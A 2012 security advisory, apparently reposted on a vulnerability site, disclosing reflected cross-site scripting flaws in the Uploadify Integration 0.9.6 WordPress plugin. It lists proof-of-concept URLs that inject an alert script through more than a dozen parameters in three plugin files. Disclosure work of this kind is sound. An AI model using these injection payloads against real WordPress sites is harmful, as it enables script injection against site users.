Uploadify Integration 0.9.6 Cross Site Scripting

2012.04.11
Credit: waraxe
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin =============================================================================== Author: Janek Vind "waraxe" Date: 06. April 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-85.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Uploadify Integration allows you to insert a jQuery uploadify uploader into your forms. Features: Uses jQuery Uploadify, Automatically saves to post meta, user meta, an option, or temporary depending on the metaType selected by the shortcode. Allows more than one shortcode per page. http://wordpress.org/extend/plugins/uploadify-integration/ Vulnerable versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected is Uploadify Integration 0.9.6, older versions may be affected as well. ############################################################################### 1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php" ############################################################################### Reason: outputting html data without proper encoding Attack vector: user submitted GET or POST parameters Preconditions: "register_globals=On" Result: XSS attack possibilities Tests: http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script> Result: XSS payload execution can be observed ############################################################################### 2. Reflected XSS vulnerability in "views/scripts/partials/file.php" ############################################################################### Reason: outputting html data without proper encoding Attack vector: user submitted GET or POST parameters Preconditions: "register_globals=On" Result: XSS attack possibilities Tests: http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script> Result: XSS payload execution can be observed ############################################################################### 3. Reflected XSS vulnerability in "views/scripts/file/error.php" ############################################################################### Reason: outputting html data without proper encoding Attack vector: user submitted GET or POST parameters Preconditions: "register_globals=On" Result: XSS attack possibilities Tests: http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script> Result: XSS payload execution can be observed Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------

References:

http://www.waraxe.us/advisory-85.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top